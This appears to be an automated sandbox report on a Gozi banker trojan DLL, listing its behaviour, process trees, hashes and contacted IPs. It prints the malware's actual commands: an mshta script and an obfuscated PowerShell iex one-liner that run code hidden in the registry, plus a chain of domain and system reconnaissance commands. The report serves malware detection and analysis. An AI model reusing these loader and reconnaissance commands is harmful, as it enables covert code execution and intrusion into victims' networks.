Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-lgghqaafep
Target 62ea3f935563b.dll
SHA256 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

Threat Level: Known bad

The file 62ea3f935563b.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Enumerates processes with tasklist

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Gathers system information

Discovers systems in the same network

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 09:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 09:30

Reported

2022-08-03 09:32

Platform

win7-20220715-en

Max time kernel

41s

Max time network

44s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Network

N/A

Files

memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

memory/1660-55-0x0000000000000000-mapping.dmp

memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp

memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1660-63-0x0000000000190000-0x000000000019D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 09:30

Reported

2022-08-03 09:32

Platform

win10v2004-20220721-en

Max time kernel

151s

Max time network

126s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3176 set thread context of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2308 set thread context of 3412 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 1676 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 3972 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 set thread context of 4872 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3488 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3488 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3488 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2984 wrote to memory of 3176 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2984 wrote to memory of 3176 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3176 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1900 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1900 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3176 wrote to memory of 3756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3176 wrote to memory of 3756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3756 wrote to memory of 2496 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3756 wrote to memory of 2496 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3176 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3176 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3176 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3176 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2308 wrote to memory of 3412 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3412 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3412 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3412 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 1676 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 1676 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 1676 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 1676 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3972 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3972 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3972 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 3972 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2308 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 4872 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2308 wrote to memory of 4872 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2308 wrote to memory of 4872 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2308 wrote to memory of 4872 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4856 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4856 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4856 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4856 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2308 wrote to memory of 4872 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2308 wrote to memory of 4872 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2308 wrote to memory of 2016 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 2016 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3696 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3696 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2308 wrote to memory of 1752 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 1752 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 4668 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 4668 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4668 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4668 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2308 wrote to memory of 1300 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 1300 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 1980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 1980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1980 wrote to memory of 4288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1980 wrote to memory of 4288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2308 wrote to memory of 4648 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Oeh7='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Oeh7).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xbxdiov -value gp; new-alias -name ivvusty -value iex; ivvusty ([System.Text.Encoding]::ASCII.GetString((xbxdiov "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5043.tmp" "c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES513D.tmp" "c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5402.bin1 > C:\Users\Admin\AppData\Local\Temp\5402.bin & del C:\Users\Admin\AppData\Local\Temp\5402.bin1"

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
FR 2.18.109.224:443 tcp
US 104.208.16.88:443 tcp
RO 37.120.206.71:80 37.120.206.71 tcp
BE 8.238.110.126:80 tcp
BE 8.238.110.126:80 tcp
BE 8.238.110.126:80 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/2732-130-0x0000000000000000-mapping.dmp

memory/2732-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/2732-136-0x00000000013D0000-0x00000000013DD000-memory.dmp

memory/3176-140-0x0000000000000000-mapping.dmp

memory/3176-141-0x00000184D1AC0000-0x00000184D1AE2000-memory.dmp

memory/3176-142-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp

memory/1900-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline

MD5 a8718937ef61364b1ff01a0f558f88fb
SHA1 b10850b439ae43950469eddf2d2e44b9d04bd2fb
SHA256 57f89a996df4e7e44e7b2f31c3dcf1134b2d46f785bc63bf314940842f1aa2c0
SHA512 0db3ea1e1c3b54537407321b02d64062a56faf40059e206ae4fb28df1c7b6c6234197bd05456642bb25e1d362d3b53a729c1c99d8366dd6c4da21040f54c29ea

\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3472-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP

MD5 13c40549927ecb565a68080079adeedf
SHA1 97337504d2c448e0802c67fa34e4472f03a9011f
SHA256 7e20b13cb6ba9ed1312daf7a2548741712dcf54fe72ccbaa751ab1d1991761bf
SHA512 972e4cbb137a1969dc3fc4cf22c65c43cbfc6f1cfccc5875953d35a02bfa321c7a345a8f639e2727350db6c96428238619ad089ca0f28137dc9eefa9cff16b3d

